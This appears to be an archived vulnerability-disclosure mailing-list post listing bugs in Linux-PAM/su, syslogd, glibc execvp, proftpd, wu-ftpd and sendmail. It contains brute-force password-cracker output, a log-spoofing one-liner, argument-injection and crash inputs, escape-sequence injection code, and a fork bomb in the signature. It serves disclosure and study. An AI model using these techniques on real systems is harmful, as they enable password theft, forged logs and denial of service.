bruterh.sh & syslogd & [g]libc & proftpd & wu-ftpd & sendmail

[lcamtuf () AGS PL (Michal Zalewski)]

This post describes / demonstrates bugs in:

- Linux-PAM implementation (password cracking)
- syslogd daemon (spoofing)
- glibc execvp() function (undesirable behaviour)
- proftpd (SEGV)
- wu-ftpd (passing arbitrary parameters to three external programs)
- Sendmail (junk characters in queue)

No reason to panic.

===================
1. PAM/su on RedHat
===================

Known? Dunno. But works.

RedHat - NothingInLogs[tm] BruteForce(R) Password Crack
-------------------------------------------------------
  - (c) 1999/2000, Michal Zalewski <lcamtuf () ids pl> -

[+] Configured against user 'testy', wordfile: words
[+] Kill-delay set to 300000 usecs...
[+] Destination account is alive and well...
[+] /bin/su seems to be executable and setuid, hopefully it works...
[+] Let's go straight to number one...
[+] Wordfile 'words' loaded - 4 passwords...
[+] Estimated time: 0 secs, max: 1 secs.
[?] Trying 'testy' (3/4)...
[*] Huh, it worked. I've tried password 'testy' for 'testy'.
[+] Time wasted: 0 seconds.
[+] Thank You, and hope you enjoyed your stay.

=====================
2. syslogd / syslog()
=====================

Unix syslogd gets 'raw' log entries from o+w /dev/log socket, while date,
priority and so on are added by user-end library function, syslog(). Very,
very clever. Get command-line socket connectivity tool at
http://lcamtuf.hack.pl/pliki/uc.c, then try:

bash$ echo -ne 'XXX YY AA:BB:CC kernel - hax0red\0' | uc /dev/log
(ctrl+c)

Well-known? Hope so, anyway it's time to think about getpeeruid() or to
change permissions on syslog socket.

=======================
3. glibc - execvp() bug
=======================

glibc 2.0.x (dunno about other versions?) execvp() is buggy - first, it
tries execve() on given program in directories specified in PATH, but
then, if it gets ENOEXEC (executable format error), it tries to treat it
just like a shell script, calling /bin/sh -c filename. Might result in
strange/undesirable behaviour:

$ cat >'-c' <<EOF
anything
EOF
$ chmod 755 -- -c
$ cat >nic.c <<EOF
main() {
  execlp("-c","call_me_jane","id",0);
}
EOF
$ gcc nic.c
$ PATH=$PATH::
$ ./a.out
uid=500(lcamtuf) gid=500(lcamtuf) groups=500(lcamtuf),2(daemon),80(network)

=====================
4. proftpd / mod_ls.c
=====================

Due to missing * in modules/mod_ls.c around line 760, pointer to another
pointer is incremented, instead of incrementing referenced pointer.
Result: SEGV. Seems to be not exploitable, as this pointer to pointer is
passed as first parameter of _parse_options function, while second
parameter to this function is hard-coded 0x80, and all we have is read
fault when isblank(*0x80) is called.

Aaah, example? Quote 'LIST  X' (note: it is 'LIST(space)(space)X') while
talking to ftpd daemon on remote side.

=======================
5. wu-ftpd popen() bugs
=======================

[lcamtuf@www lcamtuf]$ ftp localhost
Connected to localhost.
220 www.XXXXX.pl FTP server (lcamtuf) ready.
Name (localhost:lcamtuf): lcamtuf
331 Password required for lcamtuf.
Password:
230 User lcamtuf logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put "smyk" "--help"
local: smyk remote: --help
200 PORT command successful.
150 Opening BINARY mode data connection for --help.
226 Transfer complete.
321 bytes sent in 0.000243 secs (1.3e+03 Kbytes/sec)
ftp> quote site checksum "--help"
200 Usage: /bin/md5sum [OPTION] [FILE]...
ftp> ls "--version"
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
ls (GNU fileutils) 3.16
226 Transfer complete.

..unfortunately, /bin/md5sum, /bin/cksum nor /bin/ls haven't any
interesting options (like: 'use external program X', or 'dump output to
file X'), and I can't see any overflows/bugs in it.

Btw. 'quote site checksum existing_file' on RedHat machines causes ftpd
daemon to hang, because there's no md5sum/cksum in /bin (but in /usr/bin
instead).

6. Sendmail and non-ascii characters in queue.

Simply, try it:

-- queue_boo.c --
main() {
  printf("Type '.', then 'mailq' (works with TERM=linux).\n");
  execl("/usr/sbin/sendmail",
        "sendmail",
        "-O",
        "DeliveryMode=d",
        "lp(\033[2J\033[0H\033[1m* 0WNED BOX *\033[0;30m)",
        0);
}
-- EOF --

Stupid.

_______________________________________________________________________
Michal Zalewski * [lcamtuf () ags pl] <> [AGS WAN] * [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 22 813 25 86] <=-=> [cellular phone: +48 603 110 160]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]

<HR NOSHADE>
<UL>
<LI>APPLICATION/X-SH attachment: stored
</UL>